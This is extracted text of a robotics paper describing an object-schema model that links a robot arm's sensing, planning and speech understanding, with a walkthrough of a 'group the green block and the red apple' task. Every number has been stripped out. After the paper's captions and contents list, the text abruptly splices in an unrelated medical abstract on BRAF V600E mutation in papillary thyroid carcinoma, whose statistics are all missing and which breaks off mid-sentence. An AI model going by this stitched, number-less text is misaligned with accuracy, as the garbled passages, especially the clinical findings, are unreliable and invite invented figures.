model is the interaction process. interaction processes perform tasks such as taking sensory input, producing motor output, and manipulating internal records. the interaction processes run concurrently and continuously, thus ensuring responsiveness. each interaction process provides information to other processes by writing data to shared memory. by building object schemas and plan hierarchies out of interaction processes, information in the shared memory is coordinated between the sensorimotor modalities, planning, and language use. interaction processes have a main loop that can be started and stopped, and some processes exit when their main loops complete their programmed tasks. these tasks could include finding interesting visual regions or reaching the robot arm towards an object. figure shows a visual notation for four interaction processes with various run states (represented by the left-side semicircle) and various finish states (represented by the right-side semicircle). interaction histories the data that each interaction process writes to shared memory is called its interaction history. the interaction histories allow processes to provide information to each other. this use of shared memory somewhat resembles a traditional blackboard model, except that each process can only write to its dedicated space. there are two primary types of history data: attribute data, which is returned while a process is running, and completion data, which is returned when a process' loop is completed (e.g., finishing an attempt to touch an object). attribute data contains information to be incorporated into knowledge of the attributes of an object (such as colour, shape, and location). the attributes of an object can be continuous (e.g., colour and weight as measured from sensory input) or discrete (e.g., a labelled category for colour or weight). completion data contains information about whether a process completed successfully or not, as well as timing information about the process' execution. completion data, as compiled over time, is incorporated into knowledge of the affordances of an object (such as liftability or graspability). figure shows the two types of history data deriving from interaction processes. process classes each interaction process in the system is an instance of a process class. each process class defines the execution loop that its instances run. the execution loops for some of these classes exit at a defined point (e.g., finishing a grasping action) and the process reports completion data to its history. other execution loops cycle forever, causing the process to write attribute data to its history until it is destroyed (e.g., its object schema is deleted). the following are the major types of process classes: sensory processes are interaction processes that monitor incoming sensory data and write relevant data to their interaction histories. subtypes in our implementation include collision detectors, visual trackers, and touch trackers. the visual trackers watch visual input and provide continuously updated visual information about an object. the touch trackers watch touch sensor input to determine if an object is being grasped. if the object is grasped, the touch trackers output the weight of the object and the location of the object based on the hand's location. each sensory process is intended to loop forever. action processes are interaction processes that, when activated by the planning system, send motor commands to the robot. examples include a process to move the robot arm away from a collision, or to grasp the fingers around an object. an action process reports successful or failed completion when its attempt to perform its programmed actions is done. plan fragment processes operate in the planning system to coordinate actions and preconditions. for instance, the plan fragment for grasping an object could require the precondition that the hand be open and positioned at the object's location. then, it would trigger the action for closing the fingers. plan fragment processes declare themselves complete when their attempt to perform their programmed sequence is done. these processes are often created in response to verbal commands. condition processes continuously assess whether a specified condition is true or not, and when not true they trigger the planning system to search for plan fragment and action processes that can render them true. condition processes loop endlessly until removed from their plan hierarchy, although for planning purposes they add a piece of completion data to their histories when their conditions are true. translation processes convert interaction history data from other processes to a new form, such as a transformation from visual -d data to -d coordinates for targeting the arm, or a categorization from continuous colour data to a discrete colour category. these processes loop forever, and the results of their translations are written to their own interaction histories. the discrete categories (such as colour or shape labels) are used for connecting noun phrases to object schemas. coordination processes maintain the integrity of object schemas by manipulating other interaction processes. each object schema has a coordination process which monitors interactions between processes within that object schema. for instance, if visual and touch tracking disagree about an object's location, the coordination process can detach one of the processes from the object schema to resolve the conflict. these processes also loop forever, until destroyed along with their object schemas. reference processes receive noun phrases from speech input and attempt to connect the noun phrases to object schemas with matching attributes. for instance, “the green block” leads to a reference process that reads interaction histories of each active object schema to find one that best fits “green” and “block.” these processes exit and report completion when a matching object schema is identified. object schemas and the belief context interaction processes can be incorporated into (bound to) structures called object schemas. each object schema represents one physical object in the system's environment, and consists of a container that holds interaction processes that are considered to be “about” the represented object. object schemas are stored in the belief context, which is a structure that stores object schemas along with accumulated affordance information. the belief context constitutes the set of beliefs that the system currently holds about its environment and its affordances. when an interaction process is bound to an object schema, history data for that process becomes associated with the object schema as well, and is treated as attribute or affordance information for the represented object. the object schemas act as discrete entities for planning and language use. figure depicts an object schema that consists of several interaction processes and, by association, their histories. not all interaction processes are bound to object schemas. processes that provide incoming sensory input (such as collision detection and visual segmentation) typically remain unbound. object expectations when an interaction process is part of an object schema, its interaction history can be used to generate expectations of future history data. expectation data is stored with the interaction process, alongside the history data that is being predicted. there are two types of expectation data: expected attributes, which predict attribute data, and expected affordances, which predict completion data. expectations are used by the planning system to select a course of action. these expectations of future interactions would not be as straightforward to compute without the use of an object-centred framework, as mentioned in “object representation,” above. the visual notation for expectations is given in figure . completion statistics in addition to object schemas, the belief context also stores statistics on completed action and plan fragment processes. these statistics are indexed by the attribute data of the object schema that the processes were bound to. as an example, if a lift action towards a heavy red apple failed, then the belief context would note the failure of lifting with respect to the attributes for “heavy,” “red,” and “apple.” over time, trends emerge in these statistics; the “heavy” attribute might be a good predictor of difficulty lifting an object. these statistics are used to compute expected affordances, which in turn are used by the planning system to make decisions based on success likelihood. this learning of affordances for objects and attributes is the main type of learning present in our current system, although perceptual categories such as shapes and colours are also learned in a supervised manner in the current system. the association of success statistics with discrete object attributes such as “heavy” has an interesting ramification. at first glance, discrete attributes such as colour and weight labels (“red” or “heavy”) seem relevant to language use but have no efficacy in the robot's planning and actions. linking attributes to success statistics allows the attributes to predict affordances, thus linking the attributes to the physical capabilities of the robot. discrete object attributes then mean something in terms of the embodiment of the system, rather than only as a means of jointly referencing objects. this relates to the reason an embodied agent would represent discrete attributes in the first place -- awareness of discrete categories such as “heavy” helps to categorize objects based on their physical affordances. plan hierarchies and the planning system the planning system stores and manipulates plan hierarchies. like object schemas, plan hierarchies are structures composed of interaction processes. each hierarchy is a tree structure that organizes action, condition, and plan fragment processes into a coherent sequence to address a primary motivation at the root of the tree. the root of each plan hierarchy is a primary motivation, which represents a basic “need” that the system attempts to satisfy by attaching appropriate interaction processes to the hierarchy. the primary motivations have priority scores that vary over time, reflecting the changing priority for each basic need. the priority scores are passed along the hierarchy from parents to children. the non-root nodes are interaction processes that the planning system attempts to run to completion. for each node x, x's children are the interaction processes which must complete before x can. for instance, a node responsible for closing the hand around an object will have a child node that ensures that the robot's hand is at the object's position before attempting to perform the grasp. a part of such a hierarchy is shown in figure . plan hierarchies are built such that their leaf nodes form a sequence of action processes that will serve the primary motivation. across all the plan hierarchies, only the action process with the highest priority score is permitted to run at a given time. thus, the primary motivations compete according to their current priority score to build hierarchies and have the robot take actions in their service. the construction of a plan hierarchy proceeds as follows: . for the primary motivation with the highest priority score, the planning system examines a list of action and plan fragment processes that are known to satisfy the primary motivation. when multiple processes are available, the expectations computed in the belief context are consulted to determine which is most likely to succeed. the best action or plan fragment process is then attached as a child node, and the priority score is propagated to it. . when a plan fragment process is the highest priority leaf node, the first element in its sequence (either an action or a condition process) is created and attached as a child. the priority score is passed to the child, which eventually leads to the satisfaction of preconditions and the execution of actions. when a child completes, it is detached by the planning system and the next element in the plan fragment's sequence is created and processed. . when a condition process is the highest-priority leaf node, the planning system conducts a search and attaches a child in the same way as for a primary motivation. . action processes are always leaf nodes. action processes compete to execute based on the priority scores propagated from the primary motivations. when an executing action process is complete it is detached from its parent so the hierarchy's sequence can continue. by choosing appropriate plan fragments to coordinate actions and conditions, the planning system executes a coherent sequence of actions that satisfies the strongest current motivation of the system. the planning system interacts with the belief context by using object schemas as targets for action and also as sources of likelihood data to decide between possible actions. because each process in a plan hierarchy is also part of an object schema, changes recorded in interaction histories can rapidly affect likelihood data and cause revision of the plan hierarchy. language interaction incoming speech is provided to the model in the form of a parse tree. the tokens in the parse tree can then be connected to representations in the model. this primarily involves adding structures to the planning system in response to verb phrases, and connecting a noun phrase to an object schema that it refers to. when a verb phrase is received (in a command, for instance), it is assigned an appropriate structure in the planning system, such as a condition process that reports satisfaction when the command is executed. by attaching the structure to a primary motivation and setting the priority score, the planning system then takes responsibility for carrying out the relevant actions. object-directed interaction processes are typically part of the object schema of their targeted object. however, an object-directed process based on speech input has no initial target, because speech input can only provide a noun phrase that describes the target object; it cannot identify a specific object schema without further processing. because the object-directed processes cannot join an object schema until the system identifies the appropriate object schema, they are connected to a reference process until the correct object schema is found. reference processes are the interaction processes responsible for connecting object schemas to noun phrases. they search the object schemas in the current belief context for one with discrete attributes (which are automatically produced by translation processes) that correspond to the tokens in the noun phrase. for each noun phrase, a reference process is created and provided with the tokens from the phrase. the process then searches the current object schemas for one with the appropriate discrete attributes. when a match is found, all object-directed interaction processes that are connected to the reference process are added to the matching object schema. speech-driven action and plan fragment processes in plan hierarchies cannot be activated until their reference processes are resolved and they have been added to object schemas. summary in the model, interaction processes handle sensory input, motor output, and internal recordkeeping. these interaction processes are organized into object schemas, each representing one physical object, and plan hierarchies, each representing one coherent sequence of actions. language is processed by connecting noun phrases to object schemas and verb phrases to structures in the plan hierarchies. this approach presents several benefits relative to the other approaches mentioned in the background section. our model extends behaviour-based systems by explicitly representing objects, and it extends language-grounding systems by maintaining responsiveness to the environment. furthermore, by building object schemas from reactive processes, our model gains several features over an smpa language system added to a reactive robot: computational scalability instead of performing a full round of processing on current sensory inputs, our object schema model permits each bit of sensory input to affect only specific aspects of planning and language use. for example, a collision with an object can trigger a cascade of processing that directly changes the target position for subsequent grasping actions, while an smpa approach would wait for the next modelling cycle to process all sensory input. by decoupling the processing of sensory inputs from each other, our approach decreases the latency time from sensory input to motor action, and renders our approach more amenable to parallelization across multiple processors or computers. decisions can be made and altered in our model based on the interaction of a small subset of processes, rather than waiting for a complete model to be generated from new sensory input. as grounded language systems increase in complexity from the current set of relatively limited domains, our approach offers a path for scalability. common currency our model, by collecting all processes directed towards an object into the object schema, provides a convenient means of interaction between language, planning, and sensory processes. for example, hearing “the apple is heavy” enables our system to alter its plans based on this information. the system would also have arrived at the same decision if it had prior physical experience with the apple, or with objects with visual similarity to the apple. likewise, if it has to lift the apple anyway, it can decide for itself how heavy the apple is, regardless of what it had been told. this convergence of multiple modalities, including language, would be more complicated to implement in an smpa model. multimodal affordances finally, our object schemas provide a convenient way to represent affordances, such as liftability and graspability, for grounding affordance-related words. this coordination of information from multiple sources in an object-centric fashion would also be difficult in a model where planning and action are represented separately from the objects themselves. implementation walkthrough the model has been implemented on a robot platform, named trisk. in this section we describe the physical and sensorimotor systems of the robot, and then we discuss key aspects of the implemented model as it produces a sequence of behaviours. the robot and the sensorimotor systems our robot platform, named trisk (figure shows the robot in action), is a six degree of freedom (dof) robotic arm with a four-dof barrett hand as its end effector, situated in front of a table on which manipulable objects are placed. six-axis force-torque sensors on each of the three fingers of the hand enable sensing of forces and collisions, including awareness of successful grasps. the downwards force of an object on the finger sensors provide the weight of the object. two cameras (only one is currently active for simplicity) sit in a head mounted on a four-dof neck, which allows the system to adjust its view of the environment and look up at the human for interactivity purposes. visual input from the active camera is sent through a colour-based segmentation algorithm (based on cmvision [ ]) that groups contiguous regions by colour. the current set of objects used for robot interactions consists of simple objects of uniform colour, so colour segmentation suffices for our purposes. visual input is also processed on demand by a mean-shift tracker [ ] based on edge and colour profile, and a -d shape recognition algorithm based on shape contexts [ ] when requested by vision-related interaction processes. visual information thus derived includes the size, shape, colour, and location of each object, and is discretized by translation processes for matching with incoming description words (such as “red” and “ball”). visual locations are transformed into arm-space coordinates for grasping by assuming that objects are on the plane of the table and performing the appropriate vector math. the motor control modules for the robot's arm and hand compute forward and inverse kinematics, so the hand can be brought via a smooth trajectory towards reachable -d coordinates. the fingers can be spread to enable grasping, or moved together to tap an object. touch input from the fingers is used along with arm kinematic information to provide the location, direction, and magnitude of contact forces between the fingers and physical objects. collisions are detected by monitoring forces on the fingertip sensors, torques on the arm motors, and computing positions relative to hard-coded nearby surfaces. it should be noted that the robot's hand and arm significantly occludes the camera view of the workspace. the kinematics of the arm and hand are used to create what we call an “occlusion zone” in the visual input. in this area of visual input, apparent visual objects are considered untrustworthy and thus not instantiated by the model. speech input is collected by a microphone headset worn by the human, and passed through the sphinx free speech recognizer and a probabilistic earley parser (from [ ]). the resulting parse trees provide structured tokens to be connected to object schemas and plan hierarchies. an example behaviour sequence in this section we narrate a sequence of behaviours (most of which is pictured in figure ) and discuss how the implementation produces this sequence. the sequence consists of the following behaviours: . the robot is looking at a table with a blue cup and a yellow ball on it. a green block and a red apple are then placed on the table. the system tracks the objects visually, maintaining the object representations throughout new visual frames. . the human says “group the green block and the red apple.” the robot reaches towards the red apple in order to move it towards the green block. . the human interrupts the robot's action, saying “the red apple is heavy.” the robot reaches for the green block instead. . the robot misses the green block, and its wrist collides with the block. the robot immediately pulls away from the block, avoiding damage. assuming it collided with the block, the system revises its location estimate for the block. . the robot adjusts its targeting, lifts the block, and moves it next to the red apple. behaviour  the scenario begins with the robot's head facing the table with the blue cup and yellow ball. at this point, two object schemas already exist within the system, one representing the cup and the other representing the ball. both of these object schemas have been created in response to the visual input. visual tracking the green block is then placed on the table. figure depicts the processing of the subsequent frame of visual input. this processing requires extracting information about both previously- known objects, as well as starting to represent and track the green block. the three visual regions are detected by the unbound sensory process that handles visual segmentation, and written to its interaction history. each of the pre-existing object schemas includes a visual tracking process for identifying regions in new visual frames that correspond to their objects. past history data for each object schema leads to visual expectations for the object's current appearance. these expectations are compared to the regions in the new frame. the closest match for each object schema is found according to a distance metric and then “claimed” by the schema's visual tracker. new schema creation the third region written by the segmenter process goes unclaimed. as depicted in figure , the unclaimed region triggers the creation of a new object schema. new object schemas start out with a coordination process, which is responsible for subsequently creating the other processes that will maintain the object schema's data and expectations. at the outset, a typical object schema consists of: • the coordination process that bootstraps the other necessary processes and removes processes when inconsistent data is detected. • visual and touch tracking processes to assimilate incoming sensory data. • translation processes to convert continuous sensory data (such as weight and colour) into discrete attribute categories (corresponding to word labels), and to convert between visual and touch coordinate systems. the visual tracker for each object provides information derived directly from the visual input frame, such as average colour, centroid location, and occupied pixel list. the translation processes then convert these into other attributes, such as colour category, shape, and location in physical space. the expected location in physical space is used for subsequent reaching and grasping actions. action, condition, and plan fragment processes are later added to some object schemas due to planning and language activity. an action process will be bound to an object schema if the action is targeted towards the corresponding object (such as moving towards or lifting the object). a condition process will be bound to an object schema if the condition being tested involves an attribute of the object schema (such as the object being at a specific location). likewise, a plan fragment process is bound to an object schema if actions and conditions within the plan fragment are targeted towards the object. in subsequent frames, the green block is tracked by its new object schema. the red apple is then handled similarly. behaviour  the human says “group the green block and the red apple.” speech recognition and the language parser convert this verbal input into a parse tree. the parse tree triggers the creation of a plan hierarchy to coordinate the requested actions. the noun phrases in the parse tree must be connected to object schemas. in order to narrate these mechanisms, we frame the discussion by first describing the full range of verbal inputs and motivations of our implementation. types of speech input we divide our speech inputs into four types: queries requests for information that require a verbal response, such as “is the green block near the red apple?” and “describe the block.” directives requests for the robot to perform motor action, such as “touch the red apple” and “move the block to the right.” assertives statements about the state of an object, such as “the red apple is heavy.” correctives partial directives which cause replacement in the immediately preceding full directive, such as “pick up the red ball... no, the green ball.” correctives are handled in a preprocessing step, by making the substitution into the preceding directive. in this example, the speech input is a directive, and leads to a plan hierarchy that attempts to execute a sequence of actions. primary motivations the implementation makes use of three primary motivations: safety the system makes plans to avoid taking damage. in the current implementation this entails avoiding and moving away from physical collisions. social the system attempts to interact with the human partner by answering queries and carrying out requested actions. curiosity the system explores objects by attempting to grasp and lift them. in doing so, the system learns about object affordances by automatically compiling statistics about completed action processes. speech inputs that request action are processed by attaching a plan fragment process to the social motivation. for a directive, the verb is used to determine the sequence of actions that constitutes the plan fragment. the social motivation is then given a sufficient priority score to cause the planning system to carry out the given task. reference processes once the plan fragment process inherits the priority score, the planning system will attempt to expand its plan hierarchy. however, processes in a plan hierarchy cannot be handled by the planning system until it is clear which object schemas they are directed towards. the parse tree for the directive contains two noun phrases, “the green block” and “the red apple.” a reference process is generated for each noun phrase and assigned to an expression based on the parse tree. as an example, the reference process for “the red apple” is assigned the following expression: (refexpr (= function (lambda (x) (p_and (red x) (apple x)))) (= definite "definite") (= cardinality " ")))) the reference process runs a search function that matches object schemas based on category attributes provided by translation processes that were trained in a supervised fashion. when an object schema with matching attributes is identified, the processes connected to the reference process (in this case, the plan fragment process for “group”) are then bound to the object schema so planning can continue. plan hierarchy construction once an object schema is found for each of the two noun phrases, the planning system can continue by expanding the first sequence element of the “group” plan fragment. the sequence consists of a single condition, which tests whether the locations associated with the two schemas are near each other. this “grouped” condition process is created and attached as the child of the plan fragment. it then inherits the priority, and the planning system attempts to satisfy this condition. the expected results of each plan fragment is programmed with the plan fragment, so the planning system can search the list of expected results to find suitable plan fragments. the planning system can select one of two “move object” plan fragments, one that moves one object and one that moves the other. expected affordances in order to select between two possible plan fragment processes, the planning system creates both within their respective object schemas. once this is done, the belief context automatically assesses the expected affordances. this involves examining the history data of the object (i.e., how many times the object itself has been successfully moved) and the attribute-linked completion statistics (i.e., for the red apple, how often red objects are moved successfully, and how often apples are moved successfully). based on these statistics, a success likelihood is generated for each of the prospective plan fragment processes. the planning system will read these likelihoods and then select the plan fragment with the best chance of success. figure depicts the plan hierarchy as it considers the choice. figure shows the structure of this hypothetical hierarchy after it has been fully built and executed. behaviour  the robot has moved its open hand towards the apple in order to move it. at this point, the human says “the red apple is heavy.” the robot changes its mind and reaches for the green block instead. this behaviour is accomplished by processing the assertive input, updating expected affordances, and revising the plan. assertive input and expected attributes “the red apple is heavy” is a speech input that asserts a belief about an object. first, a reference process identifies the red apple's object schema. then, the label “heavy” is written as an expected attribute for the history data of the weight-categorizing translation process. affordance monitoring and plan revisions as soon as the expectation of “heavy” is added to the apple's object schema, the belief context re-evaluates the expected affordance of whether the apple can be moved by the robot. objects with the “heavy” attribute often cause lifting and moving processes to fail, and so the belief context records that any plan fragment processes attempting to lift and move the apple are likely to fail. this in turn causes the active “move object” plan fragment to expect failure, leading to a revision of the plan hierarchy. the system opts to move the block instead, and the robot proceeds to do so. behaviour  as the robot hand approaches the block, its wrist collides with the block rather than encircling the block with the fingers. it immediately pulls away from the block collision handling and claiming unbound data upon detecting the collision, the collision detection process writes information about the collision to its history. this is noticed by the primary motivation for safety, which immediately increases its priority score to the maximum possible. the action process for moving away from a collision runs immediately, and pulls the arm away. the safety motivation's priority score then drops back to zero. the collision location provided by the collision detection process is also monitored by the touch trackers of all object schemas. based on distance from an object's location estimate, each touch tracker can claim the new collision location as information about its object, writing the collision location to its interaction history. this is analogous to the claiming and writing of visual segment data by the visual trackers. in this example, the collision location is close to the block's expected location, and so the block's touch tracker revises its location estimate in physical space based on the collision. behaviour  after the interruption by the safety motivation, the social motivation resumes control. the “move hand” action process was deactivated before it completed, and so the plan hierarchy restarts the action process, which makes use of the new location estimate provided by the green block's touch tracker. the hand arrives at the green block, closes around it, moves it next to the apple, and releases it. multimodal tracking as the hand closes around the green block and begins to lift it, the touch tracker for the green block begins writing weight and location information to its interaction history. the touch tracker's location estimate is based on the location from the forward-kinematics for the hand. however, the visual tracker is continuing to provide visual locations based on the visual region associated with the block. supposing that the visual tracker and touch tracker were to provide location estimates with substantial discrepancy, the coordination process for the object schema then has to step in and reconcile the information. it does this by removing the touch tracker from the object schema. the newly- unbound touch tracker will be used as the basis for a new object schema, just as unclaimed visual regions lead to new object schemas. by concurrently tracking objects in multiple modalities, the model potentially provides a foundation for coordinating expectations between modalities in greater detail. for example, physically rotating an object may alter its perceived visual shape. this is left for future work. the model could also benefit from the ability to merge and split object schemas, to handle cases where multimodal tracking discovers an error such as one perceived object turning out to be two, or vice-versa. discussion the value of our model lies in its ability to retain a responsive coupling between its language use, planning, and sensorimotor modalities. here, we review some of the behaviours that underlie this ability: . if the robot is reaching for an object and it misses slightly, colliding its wrist with the object, it will respond to the collision by moving away from the point of contact. the point of contact will immediately be claimed by the object schema of the targeted object, which revises its expected physical location, which causes the robot to adjust its grasping target accordingly. . if the robot is reaching to move a red ball, and it accidentally lifts a nearby green block instead, the visual trackers will observe that the red ball is not moving, and will put down the green block and retry the grasp. this is the result of a discrepancy at the object schema level between the grasp trackers and the visual trackers, which is resolved by the coordination process. . when the human says “group the red apple and the green block... the red apple is heavy,” the new verbal information about the apple's weight is represented as an expectation in the same way as the equivalent physical interaction. this leads to a change in the expected affordances in the object schema, which leads to a re-evaluation of the planning system's hierarchy. the robot will reach for the green block instead. . suppose the human says “group the red apple and the green block,” without specifying any additional object information. if the robot then attempts to lift the red apple and repeatedly fails, this affects the expected affordances in the object schema in the same way, leading to the same re-evaluation. the data-sharing in our model that enables these sorts of responsive behaviours is made possible by the presence of interaction processes in both the object representations and the plan representations. in example , the touch tracker notices the touch contact near the expected location of its object schema, and claims the point of contact as another piece of expectation information. in example , the two trackers and the coordination process form a short information path between the touch and vision modalities, enabling a local correction. in example , new verbal information adjusts an expected affordance, so the belief context alters the success likelihood for the “move object” plan fragment. this plan fragment process is also present in the plan hierarchy, enabling immediate re-evaluation by the planning system. example shows the same mechanism with direct physical interaction. conclusion we have developed and implemented a model of object schemas that brings together responsive interactive robotics with natural language understanding. by building object schemas and plan hierarchies from the processes that govern responsive interaction, planning and language use are capable of leveraging information from the reactive processes directly and immediately. this stands in contrast to previous hybrid approaches that graft behaviour-based reactive control layers to smpa-based architectures. although there are many limitations to the model, the most critical one in our view is that currently all schema structures are manually constructed by human designers. as a result, we have had to take great care in creating physical environments that are consistent with the hand-coded structures of our robot. in the future we plan to turn this situation around by enabling robots to construct object schemas -- and higher order relational schemas as well -- that are consistent with whatever environment they find themselves in. acknowledgments this paper is partly based upon work supported under a national science foundation graduate research fellowship. we thank bruce blumberg and rod brooks for discussions that helped shape the work presented here. we also thank jonathan huggins, thananat jitapunkul, peter lai, john mcbean, kailas narendran, philipp robbel, kleovoulos tsourides, david wang, and jonathan wang, for their time and effort with numerous aspects of the robot system implementation. references [ ] m.a.arbib, t. iberall, and d. lyons. schemas that integrate vision and touch for hand control. in vision, brain, and cooperative computation, m.a. arbib and a.r. hanson, eds., mit press, , pp. – . [ ] c. bauckhage, j. fritsch, k. rohlfing, s. wachsmuth, and g. sagerer. evaluating integrated speech and image understanding. in proceedings of the ieee international conference on multimodal interfaces (icmi), , pp. – . [ ] p. beeson, m. macmahon, j. modayil, a. murarka, b. kuipers, and b. stankiewicz. integrating multiple representations of spatial knowledge for mapping, navigation, and communication. in proceedings of the aaai spring symposium on control mechanisms for spatial knowledge processing in cognitive / intelligent systems, . [ ] s. belongie, j. malik, and j. puzicha. shape matching and object recognition using shape contexts. ieee transactions on pattern analysis and machine intelligence, ( ), , pp. – . [ ] m. berlin, j. gray, a.l. thomaz, and c. breazeal. perspective taking: an organizing principle for learning in human-robot interaction. in proceedings of the twenty-first national conference on artificial intelligence (aaai), . [ ] c. breazeal, m. berlin, a. brooks, j. gray, and a.l. thomaz. using perspective taking to learn from ambiguous demonstrations. journal of robotics and autonomous systems, special issue on robot programming by demonstration, ( ), . [ ] r.a. brooks. a robust layered control system for a mobile robot. ieee journal of robotics and automation, , , pp. – . [ ] r.a. brooks. intelligence without representation. artificial intelligence, , , pp. – . [ ] j. bruce, t. balch, and m. veloso. fast and inexpensive colour image segmentation for interactive robots. in proceedings of the ieee/rsj international conference on intelligent robots and systems (iros), . [ ] j. j. bryson. intelligence by design: principles of modularity and coordination for engineering complex adaptive agents. phd thesis, massachusetts institute of technology, . [ ] j. j. bryson and l. a. stein. modularity and design in reactive intelligence. in proceedings of the international joint conference on artificial intelligence, , pp. – . [ ] r. burke, d. isla, m. downie, y. ivanov, and b. blumberg. creature smarts: the art and architecture of a virtual brain. in proceedings of the game developers conference, , pp. – . [ ] a. cangelosi. the grounding and sharing of symbols. pragmatics and cognition, , , pp. – . [ ] a. clark and j. toribio. doing with representing. synthese, , , pp. – . [ ] d. comaniciu and p. meer. mean shift: a robust approach toward feature space analysis. ieee transactions on pattern analysis and machine intelligence, ( ), . [ ] g. drescher. made-up minds: a constructivist approach to artificial intelligence. mit press, . [ ] p. fitzpatrick. from first contact to close encounters: a developmentally deep perceptual system for a humanoid robot. phd thesis, massachusetts institute of technology, . [ ] p. fitzpatrick and g. metta. grounding vision through experimental manipulation. philosophical transactions of the royal society: mathematical, physical, and engineering sciences, ( ), , pp. – . [ ] e. gat. integrating planning and reaction in a heterogeneous asynchronous architecture for controlling mobile robots. in proceedings of the tenth national conference on artificial intelligence (aaai), . [ ] e. gat. three-layer architectures. in artificial intelligence and mobile robots, d. krotenkamp, r.p. bannasso, and r. murphy, eds., aaai press, . [ ] j. j. gibson. the ecological approach to visual perception. erlbaum, . [ ] p. gorniak and d. roy. situated language understanding as filtering perceived affordances. cognitive science, ( ), , pp. – . [ ] k. hsiao and d. roy. a habit system for an interactive robot. in aaai fall symposium: from reactive to anticipatory cognitive embodied systems, . [ ] d. isla, r. burke, m. downie, and b. blumberg. a layered brain architecture for synthetic creatures. in proceedings of international joint conferences on artificial intelligence, . [ ] l.s. lopes and j.h. connell. semisentient robots: routes to integrated intelligence. ieee intelligent systems, , , pp. – . [ ] l.s. lopes and a. teixeira. human-robot interaction through spoken language dialogue. in proceedings of the ieee/rsj international conference on intelligent robots and systems, . [ ] j. modayil and b. kuipers. where do actions come from? autonomous robot learning of objects and actions. in proceedings of the aaai spring symposium on control mechanisms for spatial knowledge processing in cognitive / intelligent systems, . [ ] n. j. nilsson. shakey the robot. technical report , ai center, sri international, . [ ] j. piaget. the construction of reality in the child. basic books, . [ ] t. regier and l. carlson. grounding spatial language in perception: an empirical and computational investigation. journal of experimental psychology, ( ), , pp. – . [ ] d. roy. grounding words in perception and action: computational insights. trends in cognitive science, ( ), , pp. – . [ ] d. roy. semiotic schemas: a framework for grounding language in action and perception. artificial intelligence, ( - ), , pp. – . [ ] d. roy. a mechanistic model of three facets of meaning. in symbols and embodiment, m.d. vega, g. glennberg, and g. graesser, eds., oxford university press, . [ ] d. roy, k. hsiao, and n. mavridis. mental imagery for a conversational robot. ieee transactions on systems, man, and cybernetics, , , pp. – . [ ] d. roy and e. reiter. connecting language to the world. artificial intelligence, ( - ), , pp. – . [ ] j.m. siskind. grounding the lexical semantics of verbs in visual perception using force dynamics and event logic. journal of artificial intelligence research, , , pp. – . [ ] m. skubic, d. perzanowski, s. blisard, a. schultz, w. adams, m. bugajska, and d. brock. spatial language for human-robot dialogs. ieee transactions on smc part c, special issue on human- robot interaction, ( ), , pp. – . [ ] l. steels and t. belpaeme. coordinating perceptually grounded categories through language: a case study for colour. behavioural and brain sciences, , , pp. – . [ ] a. stoytchev. behaviour-grounded representation of tool affordances. in proceedings of ieee international conference on robotics and automation (icra), . [ ] p. vogt and f. divina. social symbol grounding and language evolution. interaction studies, ( ), , pp. – . [ ] t. winograd. understanding natural language. academic press, . figure . the robot, trisk, is facing a scene that includes a red apple and a green block. a) trisk is told, “group the green block and the red apple.” this request could be satisfied by moving the block towards the apple, or vice versa. the robot decides to move the apple. b) while the robot reaches for the apple, the human adds, “the red apple is heavy.” knowing that heavy objects are more difficult to lift, the robot changes its plan and c) moves the green block d) towards the apple instead. this example demonstrates the responsiveness of the system to new information. figure . an smpa hybrid model connects language use to a model of the physical world. responsive behaviours can be run at a higher priority independently of the smpa modules, enabling responsiveness but remaining separate from the main system. figure . in our model, responsive processes (small ellipses, with small arrows depicting information passed in and out) are organized into object schemas (large boxes). the processes handle the various functions needed to maintain the object schema and connect to language. figure . visual notation for four example interaction processes with various run states and finish states. figure . visual notation for interaction history data generated by interaction processes. for simplicity, not all history data will be shown for processes depicted in such diagrams. figure . an object schema, containing three interaction processes relevant to its represented object. the reference process is depicted on the edge of the object schema to denote that it controls the object schema by including or removing other processes from the schema. for simplicity, not all processes in an object schema will be shown in these diagrams. figure . top: the visual location associated with this example object schema leads to (denoted by the small arrow) an expectation that the corresponding grasp action will complete successfully. bottom: the grasp action is completed and reports a failure. figure . an example plan hierarchy, showing the primary “social” motivation connected to a tree of interaction processes. the arrows denote a parent-child relation, and indicate that the parent cannot be completed until the child completes. the tree consists of action processes, condition processes, and plan fragment processes. figure . top: the visual segmenter produces a list of coloured regions from a frame of visual input. middle: based on their histories, the visual trackers of two object schemas have expected attributes for how their visual regions will appear in the new frame. bottom: the visual trackers have claimed the regions from the visual segmenter's interaction history, and copied the new visual data to their own histories. figure . top: the unclaimed visual segment from figure triggers the creation of a new object schema in the belief context. bottom: the new schema's coordination process immediately creates trackers and translators which populate the history data for the object schema. figure . the planning system must choose between two plan fragments, both of which might satisfy the “grouped” condition process. figure . a completed plan hierarchy for grouping the green block (object ) and the red apple (object ). action processes are typically deleted when they complete, but they are depicted here to show the entire structure. temporal sequences for children of plan fragments are shown left-to-right. abstract object-centred, behaviour-based language grounding background smpa and non-linguistic behaviour-based robots object representation reactive grounded language robots other grounded language systems interaction processes and the object schema model interaction processes and histories object schemas and the belief context plan hierarchies and the planning system language interaction summary implementation walkthrough the robot and the sensorimotor systems an example behaviour sequence behaviour behaviour behaviour behaviour behaviour discussion conclusion acknowledgments references : – c yan, m huang et al. braf v e mutation in ptc research relationship between braf v e and clinical features in papillary thyroid carcinoma changjiao yan*, meiling huang*, xin li, ting wang and rui ling department of thyroid, breast and vascular surgery, xijing hospital, fourth military medical university, xi’an, shaanxi, china correspondence should be addressed to r ling or t wang: lingruiaoxue@ .com or ting_w @ .com *(c yan and m huang contributed equally to this work) abstract objective: to investigate the mutant status of braf gene and analyze its relationship to epidemiological risk factors and clinical outcomes among patients with papillary thyroid cancer (ptc) in the largest, single-institution chinese cohort to date. methods: the medical records of ptc patients were reviewed in this retrospective study. single-factor and multiple logistic regression analyses were applied to identify risk factors for braf v e mutation. survival outcomes including distant metastatic and persistent or recurrent ptc were examined, with a mean follow-up time of . ( – ) months. results: the braf v e mutation was present in . % of patients ( of ). correlation was found between braf v e mutation and several epidemiological features, including age, concomitant hypertension and hashimoto thyroiditis (ht). for the clinicopathological features, braf v e was significantly associated with bilateral multifocality (odds ratio (or) . , % confidence interval (ci) . – . , p <  . ) and less lateral lymph node metastases (or . , % ci . – . , p <  . ). smaller tumor size and advanced disease stage were significant in single-factor analyses but became insignificant after multivariate adjustment. no association was found between braf v e mutation and extrathyroidal invasion, distant metastatic and disease persistence or recurrence. conclusion: part of epidemiological features are independent risk or protective factors for braf v e mutation. the presence of braf v e mutation is not an aggressive prognosis on poor clinical outcomes in ptc. however, the high prevalence of braf v e may provide guidance for surgery strategy and opportunity for targeted treatment in recurrent and 